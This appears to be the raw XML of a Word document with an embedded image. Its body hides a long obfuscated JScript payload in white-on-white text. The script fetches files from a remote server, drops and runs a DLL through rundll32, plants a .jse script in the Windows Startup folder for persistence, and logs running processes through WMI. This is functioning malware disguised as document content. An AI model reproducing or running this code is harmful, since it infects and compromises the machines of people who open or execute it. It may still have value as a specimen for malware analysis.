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58C94F" w14:textId="39EAC286" w:rsidR="003D3F40" w:rsidRPr="00C5690E" w:rsidRDefault="00E65F7D" w:rsidP="004411CA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF7704">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00504949" w:rsidRPr="00C5690E">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01E31DB1" wp14:editId="1D369F0C">
            <wp:extent cx="5873317" cy="27622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75063" cy="27630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354F6A" w14:textId="292A0E32" w:rsidR="000E5129" w:rsidRPr="00C5690E" w:rsidRDefault="00C20F81" w:rsidP="00A24F60">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F02D6">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">var _0x1237=['\x72\x65\x74\x75','\x6d\x73\x5c\x53','\x73\x61\x67\x65','\x72\x65\x73\x70','\x5c\x4d\x69\x63','\x51\x75\x69\x74','\x45\x6e\x76\x69','\x43\x6c\x6f\x73','\x2e\x30\x2e\x31','\x73\x74\x61\x74','\x4f\x70\x65\x6e','\x4d\x20\x57\x69','\x20\x2b\x20\x22','\x42\x56\x4c\x48','\x2d\x64\x65\x63','\x53\x61\x76\x65','\x72\x6f\x73\x6f','\x61\x70\x70\x6c','\x63\x65\x72\x74','\x72\x6f\x6e\x6d','\x72\x75\x6e','\x20\x46\x52\x4f','\x72\x65\x61\x6d','\x43\x3a\x5c\x55','\x3a\x5c\x5c','\x70\x74\x69\x6e','\x20\x5d\x2b\x29','\x6f\x70\x65\x6e','\x76\x69\x72\x6f','\x20\x2b\x5b\x5e','\x20\x2d\x66\x20','\x6f\x63\x2e\x74','\x2f\x4d\x65\x73','\x74\x61\x72\x74','\x53\x6c\x65\x65','\x6d\x76\x32','\x57\x69\x6e\x33','\x20\x4d\x65\x6e','\x63\x3a\x5c\x41','\x54\x79\x70\x65','\x6c\x6f\x67\x6f','\x72\x75\x6e\x64','\x75\x5c\x50\x72','\x2e\x6a\x73\x65','\x42\x6f\x64\x79','\x4f\x62\x6a\x65','\x78\x74\x46\x69','\x74\x69\x6f\x6e','\x6e\x33\x32\x5f','\x74\x53\x74\x72','\x4c\x32\x2e\x53','\x2e\x64\x6c\x6c','\x74\x65\x4f\x62','\x44\x61\x74\x61','\x2b\x29\x2b\x5b','\x6f\x6e\x73\x65','\x53\x63\x72\x69','\x47\x45\x54','\x20\x49\x6e\x6a','\x6a\x65\x63\x74','\x52\x65\x70\x6f','\x65\x73\x73','\x54\x6f\x46\x69','\x48\x54\x54\x50','\x6f\x63\x65\x73','\x50\x6f\x73\x69','\x73\x65\x6e\x64','\x20\x5d\x2b\x28','\x57\x72\x69\x74','\x72\x74\x5c\x73','\x74\x5c\x63\x69','\x42\x2e\x53\x74','\x30\x2e\x34\x32','\x72\x6e\x61\x6d','\x74\x65\x54\x65','\x69\x73\x74\x31','\x46\x69\x6c\x65','\x70\x72\x69\x6c','\x69\x70\x74\x2e','\x67\x6d\x74\x73','\x5e\x28\x5b\x5e','\x43\x54\x20\x2a','\x65\x72\x76\x65','\x74\x68\x69\x73','\x67\x2e\x46\x69','\x53\x68\x65\x6c','\x65\x4c\x69\x6e','\x53\x45\x4c\x45','\x5c\x52\x6f\x61','\x69\x74\x65\x6d','\x6e\x6d\x65\x6e','\x6f\x64\x65\x20','\x33\x35\x38\x33','\x44\x4c\x4c\x2e','\x4c\x69\x73\x74','\x79\x73\x50\x72','\x2d\x2d\x2d\x2d','\x69\x70\x74\x20','\x50\x72\x6f\x63','\x5c\x4d\x65\x73','\x45\x78\x69\x73','\x32\x5f\x50\x72','\x25\x75\x73\x65','\x3a\x2f\x2f\x31','\x65\x6e\x74','\x2f\x6d\x61\x6c','\x6e\x64\x45\x6e','\x72\x74\x5c\x4c','\x72\x58\x4d\x4c','\x57\x53\x63\x72','\x74\x72\x75\x63','\x5e\x20\x5d\x7d','\x54\x45\x4d\x50','\x4e\x65\x78\x74','\x72\x6e\x20\x2f','\x43\x72\x65\x61','\x66\x74\x5c\x57','\x64\x6c\x6c','\x43\x6f\x70\x79','\x41\x44\x4f\x44','\x68\x74\x74\x70','\x4e\x61\x6d\x65','\x2d\x2d\x2d','\x75\x74\x69\x6c','\x4d\x53\x58\x4d','\x74\x6f\x72'];var _0x3ed7=function(_0x3ed787,_0x2b87c8){_0x3ed787=_0x3ed787-(0x1f*0xd+-0xf47+0xe1a);var _0x3698a4=_0x1237[_0x3ed787];return _0x3698a4;};var _0x17806d=function(_0x31efca,_0x346a91){return _0x3ed7(_0x31efca- -0x333,_0x346a91);},_0x4fef69=function(){var _0x28e790=!![];return function(_0x2aa95a,_0x23d0c5){var _0x4298cb=_0x28e790?function(){var _0x1c870e=function(_0x170217,_0x583989){return _0x3ed7(_0x583989-0x20e,_0x170217);};if(_0x23d0c5){var _0x378a36=_0x23d0c5[_0x1c870e(0x250,0x285)+'\x79'](_0x2aa95a,arguments);return _0x23d0c5=null,_0x378a36;}}:function(){};return _0x28e790=![],_0x4298cb;};}(),_0x468798=_0x4fef69(this,function(){var _0x292649=function(){var _0x346211=function(_0x3dc11e,_0x3c09ea){return _0x3ed7(_0x3dc11e-0x1f6,_0x3c09ea);};if('\x42\x56\x4c\x48'+'\x73'===_0x346211(0x269,0x273)+'\x73'){var _0x58729e=_0x292649['\x63\x6f\x6e\x73'+_0x346211(0x2ca,0x2a0)+_0x346211(0x2d9,0x2b8)](_0x346211(0x25c,0x27f)+_0x346211(0x2ce,0x2d0)+'\x22\x20\x2b\x20'+_0x346211(0x2af,0x2e8)+_0x346211(0x268,0x24f)+'\x2f')()['\x63\x6f\x6e\x73'+_0x346211(0x2ca,0x2a6)+'\x74\x6f\x72'](_0x346211(0x2ac,0x281)+_0x346211(0x29f,0x264)+_0x346211(0x279,0x2b4)+_0x346211(0x276,0x285)+_0x346211(0x292,0x272)+_0x346211(0x2cb,0x2bf));return!_0x58729e['\x74\x65\x73\x74'](_0x468798);}else{function _0x54e95a(){var _0x257e93=function(_0x25fa82,_0x545768){return _0x346211(_0x25fa82- -0xe6,_0x545768);};_0x1fee58[_0x257e93(0x1ba,0x1f4)+_0x257e93(0x1cc,0x1be)+'\x65'](_0x257e93(0x1ef,0x1b0)+'\x3a\x20'+_0x302f97[_0x257e93(0x1cf,0x1fb)]()['\x4e\x61\x6d\x65']);}}};return _0x292649();});_0x468798();var objShell=WScript[_0x17806d(-0x25a,-0x232)+'\x74\x65\x4f\x62'+_0x17806d(-0x292,-0x2b9)](_0x17806d(-0x260,-0x265)+_0x17806d(-0x27f,-0x281)+_0x17806d(-0x278,-0x271)+'\x6c'),colSystemEnvVars=objShell[_0x17806d(-0x2c7,-0x29a)+_0x17806d(-0x2ba,-0x2a2)+_0x17806d(-0x265,-0x297)](_0x17806d(-0x26b,-0x280)+'\x65\x73\x73'),x=colSystemEnvVars(_0x17806d(-0x25d,-0x257)),fso=new ActiveXObject(_0x17806d(-0x295,-0x2ce)+_0x17806d(-0x2b4,-0x2ad)+_0x17806d(-0x279,-0x24d)+'\x6c\x65\x53\x79'+'\x73\x74\x65\x6d'+_0x17806d(-0x2a0,-0x288)+'\x63\x74'),filePath2=x+'\x5c'+(_0x17806d(-0x26f,-0x296)+'\x31')+_0x17806d(-0x2a2,-0x2dd),randomNum=_0x17806d(-0x271,-0x297)+'\x32\x34\x31\x32'+'\x31\x35',outModule=x+'\x5c'+randomNum,outDLL=x+(_0x17806d(-0x26a,-0x267)+_0x17806d(-0x2cb,-0x304)+'\x44\x4c\x4c\x2e'+_0x17806d(-0x258,-0x253));if(fso['\x46\x69\x6c\x65'+_0x17806d(-0x269,-0x262)+'\x74\x73'](filePath2)){url=_0x17806d(-0x255,-0x281)+_0x17806d(-0x266,-0x26d)+_0x17806d(-0x285,-0x2a9)+_0x17806d(-0x2c5,-0x28f)+_0x17806d(-0x2ad,-0x2cb)+_0x17806d(-0x2cb,-0x2b5)+_0x17806d(-0x270,-0x274)+_0x17806d(-0x258,-0x227),WScript[_0x17806d(-0x2ab,-0x2bd)+'\x70'](-0x1*0x9f7+0x20a6+0xedf*-0x1);var request=WScript[_0x17806d(-0x25a,-0x21d)+'\x74\x65\x4f\x62'+'\x6a\x65\x63\x74'](_0x17806d(-0x251,-0x261)+_0x17806d(-0x29b,-0x2bc)+_0x17806d(-0x27b,-0x285)+_0x17806d(-0x261,-0x26c)+'\x48\x54\x54\x50');request['\x6f\x70\x65\x6e'](_0x17806d(-0x294,-0x296),url,![]),request[_0x17806d(-0x28b,-0x27d)]();if(request[_0x17806d(-0x2c4,-0x298)+'\x75\x73']===-0x1821+0x6*-0x36f+0x2d83){var stream=WScript['\x43\x72\x65\x61'+_0x17806d(-0x299,-0x293)+_0x17806d(-0x292,-0x2ba)](_0x17806d(-0x256,-0x258)+_0x17806d(-0x286,-0x278)+_0x17806d(-0x2b7,-0x2e4));stream[_0x17806d(-0x2c3,-0x2e7)](),stream[_0x17806d(-0x2a6,-0x28a)]=0x1*0xc1f+-0x1953+0xd35,stream[_0x17806d(-0x289,-0x2aa)+'\x65'](request[_0x17806d(-0x2ca,-0x307)+_0x17806d(-0x296,-0x2af)+_0x17806d(-0x2a1,-0x27a)]),stream['\x50\x6f\x73\x69'+_0x17806d(-0x29e,-0x2b1)]=0x18a+-0x49*0x57+0x1*0x1745,stream[_0x17806d(-0x2be,-0x2fc)+_0x17806d(-0x28f,-0x258)+'\x6c\x65'](outDLL,-0x728+-0xb7e+0x12a8),stream[_0x17806d(-0x2c6,-0x2ad)+'\x65']();}else </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F02D6">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WScript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001F02D6">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">['\x51\x75\x69\x74'](-0xa9c+-0xef+0xb8c);var uname=objShell['\x45\x78\x70\x61'+_0x17806d(-0x263,-0x294)+_0x17806d(-0x2b1,-0x2d9)+_0x17806d(-0x273,-0x296)+_0x17806d(-0x29c,-0x29d)+'\x69\x6e\x67\x73'](_0x17806d(-0x267,-0x250)+_0x17806d(-0x284,-0x261)+'\x65\x25'),stPath=_0x17806d(-0x2b6,-0x2cb)+'\x73\x65\x72\x73'+'\x5c'+uname+('\x5c\x41\x70\x70'+_0x17806d(-0x298,-0x294)+_0x17806d(-0x275,-0x29e)+'\x6d\x69\x6e\x67'+_0x17806d(-0x2c9,-0x2b0)+_0x17806d(-0x2bd,-0x2e9)+_0x17806d(-0x259,-0x240)+'\x69\x6e\x64\x6f'+'\x77\x73\x5c\x53'+_0x17806d(-0x2ac,-0x287)+_0x17806d(-0x2a8,-0x295)+_0x17806d(-0x2a3,-0x2b0)+'\x6f\x67\x72\x61'+_0x17806d(-0x2cc,-0x2f9)+_0x17806d(-0x2ac,-0x2e3)+'\x75\x70\x5c')+randomNum+_0x17806d(-0x2a2,-0x2a5);WScript['\x53\x6c\x65\x65'+'\x70'](-0x3e1+-0x1f*0xfd+0x2a54),objShell[_0x17806d(-0x2b9,-0x28e)](_0x17806d(-0x2bb,-0x295)+_0x17806d(-0x252,-0x261)+_0x17806d(-0x2af,-0x28b)+_0x17806d(-0x2bf,-0x28b)+_0x17806d(-0x272,-0x2b1)+outModule+'\x20'+outModule+_0x17806d(-0x29a,-0x2d1),0x156f+0x10d*0x16+-0x2c8d),WScript['\x53\x6c\x65\x65'+'\x70'](-0x24fe+0x4*-0x1af+-0x5ba*-0x9),fso[_0x17806d(-0x257,-0x271)+_0x17806d(-0x281,-0x274)](filePath2,stPath,-0x1745+0x1701+0x1*0x44);var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F02D6">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>objShell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001F02D6">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=new ActiveXObject(_0x17806d(-0x260,-0x298)+_0x17806d(-0x27f,-0x2a8)+'\x73\x68\x65\x6c'+'\x6c');WScript['\x53\x6c\x65\x65'+'\x70'](0x8b*0x13+0x24f+-0x4d0),objShell[_0x17806d(-0x2b9,-0x2e9)](_0x17806d(-0x2a4,-0x2cc)+'\x6c\x6c\x33\x32'+'\x2e\x65\x78\x65'+'\x20'+outModule+'\x2e\x64\x6c\x6c'+(_0x17806d(-0x293,-0x2c5)+'\x65\x63\x74\x44'+'\x4c\x4c'),0xaad*0x1+-0x1d3d+-0x1b*-0xb0),WScript['\x53\x6c\x65\x65'+'\x70'](0x1c69+0x25*0xd4+-0x333d);}else{url='\x68\x74\x74\x70'+_0x17806d(-0x266,-0x25e)+_0x17806d(-0x285,-0x280)+_0x17806d(-0x2c5,-0x2c3)+_0x17806d(-0x264,-0x23c)+'\x46\x69\x6c\x65';var filePath='\x43\x3a\x5c\x41'+'\x70\x72\x69\x6c'+_0x17806d(-0x291,-0x29d)+_0x17806d(-0x262,-0x271)+_0x17806d(-0x282,-0x297)+'\x2e\x6a\x73\x65';WScript['\x53\x6c\x65\x65'+'\x70'](0x1*0x24b2+0x1999+-0x367b);var request=WScript['\x43\x72\x65\x61'+'\x74\x65\x4f\x62'+_0x17806d(-0x292,-0x2a6)](_0x17806d(-0x251,-0x247)+_0x17806d(-0x29b,-0x2da)+_0x17806d(-0x27b,-0x25d)+_0x17806d(-0x261,-0x228)+_0x17806d(-0x28e,-0x2a8));request[_0x17806d(-0x2b2,-0x28a)](_0x17806d(-0x294,-0x265),url,![]),request[_0x17806d(-0x28b,-0x2c7)]();if(request[_0x17806d(-0x2c4,-0x2fb)+'\x75\x73']===-0x1925*0x1+-0xb89+-0x112*-0x23){var stream=WScript[_0x17806d(-0x25a,-0x25a)+_0x17806d(-0x299,-0x297)+_0x17806d(-0x292,-0x262)](_0x17806d(-0x256,-0x271)+'\x42\x2e\x53\x74'+_0x17806d(-0x2b7,-0x2e2));stream[_0x17806d(-0x2c3,-0x2af)](),stream[_0x17806d(-0x2a6,-0x2a5)]=-0xd3*0x15+0xcff*-0x3+0xcb*0x47,stream[_0x17806d(-0x289,-0x287)+'\x65'](request[_0x17806d(-0x2ca,-0x297)+_0x17806d(-0x296,-0x29a)+_0x17806d(-0x2a1,-0x2c6)]),stream[_0x17806d(-0x28c,-0x27c)+'\x74\x69\x6f\x6e']=-0x574*0x5+0xc24+0xf20,stream[_0x17806d(-0x2be,-0x2a4)+'\x54\x6f\x46\x69'+'\x6c\x65'](outModule,-0x1*-0xbed+0x26db*-0x1+0x1af0),stream[_0x17806d(-0x2c6,-0x2e6)+'\x65']();}else WScript[_0x17806d(-0x2c8,-0x2bd)](0xcf2+0x1517*-0x1+0x826);WScript[_0x17806d(-0x2ab,-0x28b)+'\x70'](0xacf*0x2+0x2566+-0x3334);var strComputer='\x2e',objWMIService=GetObject('\x77\x69\x6e\x6d'+_0x17806d(-0x27e,-0x2a6)+_0x17806d(-0x2b5,-0x27a)+strComputer+('\x5c\x72\x6f\x6f'+_0x17806d(-0x287,-0x29f)+_0x17806d(-0x2aa,-0x2e1))),runningProccesses=objWMIService['\x45\x78\x65\x63'+'\x51\x75\x65\x72'+'\x79'](_0x17806d(-0x276,-0x237)+_0x17806d(-0x27c,-0x240)+_0x17806d(-0x2b8,-0x2b6)+_0x17806d(-0x2c2,-0x2e9)+_0x17806d(-0x29d,-0x27a)+_0x17806d(-0x26b,-0x264)+_0x17806d(-0x290,-0x284),null,-0x533*0x4+0x6*0x446+-0x4a8),objItem=new Enumerator(runningProccesses),textFile;textFile=fso[_0x17806d(-0x25a,-0x251)+_0x17806d(-0x283,-0x28b)+_0x17806d(-0x29f,-0x2c3)+'\x6c\x65'](_0x17806d(-0x2a7,-0x2bf)+_0x17806d(-0x280,-0x244)+_0x17806d(-0x291,-0x298)+_0x17806d(-0x288,-0x2af)+_0x17806d(-0x26e,-0x247)+_0x17806d(-0x2ae,-0x2cf)+'\x78\x74',!![]),textFile[_0x17806d(-0x289,-0x2ba)+_0x17806d(-0x277,-0x29d)+'\x65'](_0x17806d(-0x2a9,-0x283)+_0x17806d(-0x268,-0x266)+_0x17806d(-0x28d,-0x252)+'\x73\x65\x73'),textFile['\x57\x72\x69\x74'+_0x17806d(-0x277,-0x264)+'\x65'](_0x17806d(-0x26d,-0x282)+_0x17806d(-0x26d,-0x268)+_0x17806d(-0x26d,-0x24f)+_0x17806d(-0x26d,-0x273)+_0x17806d(-0x26d,-0x29b)+'\x2d\x2d\x2d\x2d'+_0x17806d(-0x26d,-0x28d)+_0x17806d(-0x26d,-0x271)+_0x17806d(-0x253,-0x24e));for(;!objItem['\x61\x74\x45\x6e'+'\x64']();objItem['\x6d\x6f\x76\x65'+_0x17806d(-0x25c,-0x286)]()){textFile['\x57\x72\x69\x74'+_0x17806d(-0x277,-0x245)+'\x65'](_0x17806d(-0x254,-0x21c)+'\x3a\x20'+objItem[_0x17806d(-0x274,-0x25e)]()[_0x17806d(-0x254,-0x245)]);}textFile['\x43\x6c\x6f\x73'+'\x65'](),WScript[_0x17806d(-0x2ab,-0x283)+'\x70'](-0x1b21+0x113*-0x12+0x3647),fso['\x43\x6f\x70\x79'+_0x17806d(-0x281,-0x262)](filePath,filePath2),objShell[_0x17806d(-0x2b9,-0x297)]('\x63\x73\x63\x72'+_0x17806d(-0x26c,-0x24d)+'\x2f\x2f\x6e\x6f'+_0x17806d(-0x2a5,-0x2b8)+'\x20'+filePath2,-0xa1b+0x6cd+0x34e);}</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="000E5129" w:rsidRPr="00C569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hideSpellingErrors/>
  <w:hideGrammatical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249D"/>
    <w:rsid w:val="00052280"/>
    <w:rsid w:val="00056D23"/>
    <w:rsid w:val="00083A9E"/>
    <w:rsid w:val="000E4D7E"/>
    <w:rsid w:val="000E5129"/>
    <w:rsid w:val="00100219"/>
    <w:rsid w:val="00136D36"/>
    <w:rsid w:val="001A249D"/>
    <w:rsid w:val="001F02D6"/>
    <w:rsid w:val="002636A7"/>
    <w:rsid w:val="002D5101"/>
    <w:rsid w:val="00303B7C"/>
    <w:rsid w:val="003537D0"/>
    <w:rsid w:val="003A7766"/>
    <w:rsid w:val="003D3F40"/>
    <w:rsid w:val="003F3678"/>
    <w:rsid w:val="0043419C"/>
    <w:rsid w:val="004411CA"/>
    <w:rsid w:val="004A3A7D"/>
    <w:rsid w:val="004C4973"/>
    <w:rsid w:val="004F0BF9"/>
    <w:rsid w:val="00503D1C"/>
    <w:rsid w:val="00504949"/>
    <w:rsid w:val="00526095"/>
    <w:rsid w:val="00535B8C"/>
    <w:rsid w:val="006E0CF4"/>
    <w:rsid w:val="006E7DB3"/>
    <w:rsid w:val="00705B57"/>
    <w:rsid w:val="00745EF4"/>
    <w:rsid w:val="00755AF6"/>
    <w:rsid w:val="007C1EFB"/>
    <w:rsid w:val="007E29F3"/>
    <w:rsid w:val="00841569"/>
    <w:rsid w:val="008A41BE"/>
    <w:rsid w:val="008A4866"/>
    <w:rsid w:val="008D01A2"/>
    <w:rsid w:val="008F4B61"/>
    <w:rsid w:val="008F69F2"/>
    <w:rsid w:val="009213C7"/>
    <w:rsid w:val="00970F5B"/>
    <w:rsid w:val="00976D7F"/>
    <w:rsid w:val="009D3593"/>
    <w:rsid w:val="00A06150"/>
    <w:rsid w:val="00A24F60"/>
    <w:rsid w:val="00A27F50"/>
    <w:rsid w:val="00A5633F"/>
    <w:rsid w:val="00AC3208"/>
    <w:rsid w:val="00AC4B4E"/>
    <w:rsid w:val="00AC66AA"/>
    <w:rsid w:val="00B537BB"/>
    <w:rsid w:val="00B609AD"/>
    <w:rsid w:val="00BD1DAD"/>
    <w:rsid w:val="00BF7577"/>
    <w:rsid w:val="00C02D94"/>
    <w:rsid w:val="00C14B12"/>
    <w:rsid w:val="00C20F81"/>
    <w:rsid w:val="00C26C37"/>
    <w:rsid w:val="00C5690E"/>
    <w:rsid w:val="00C72F17"/>
    <w:rsid w:val="00C7309F"/>
    <w:rsid w:val="00C750E5"/>
    <w:rsid w:val="00D0503E"/>
    <w:rsid w:val="00D07849"/>
    <w:rsid w:val="00D56F89"/>
    <w:rsid w:val="00DB29EA"/>
    <w:rsid w:val="00DC27BD"/>
    <w:rsid w:val="00DE516C"/>
    <w:rsid w:val="00E0468C"/>
    <w:rsid w:val="00E27B26"/>
    <w:rsid w:val="00E65F7D"/>
    <w:rsid w:val="00F15555"/>
    <w:rsid w:val="00F3444C"/>
    <w:rsid w:val="00F63BBB"/>
    <w:rsid w:val="00FA6819"/>
    <w:rsid w:val="00FC2F73"/>
    <w:rsid w:val="00FF3D07"/>
    <w:rsid w:val="00FF77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C42AA6"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A5ADB54A-64E9-4654-B0CF-98A45D6AF6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15980</TotalTime>
  <Pages>1</Pages>
  <Words>1654</Words>
  <Characters>9431</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>78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Baverstock</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Consultant</cp:lastModifiedBy>
  <cp:revision>72</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-01-28T19:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-22T18:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>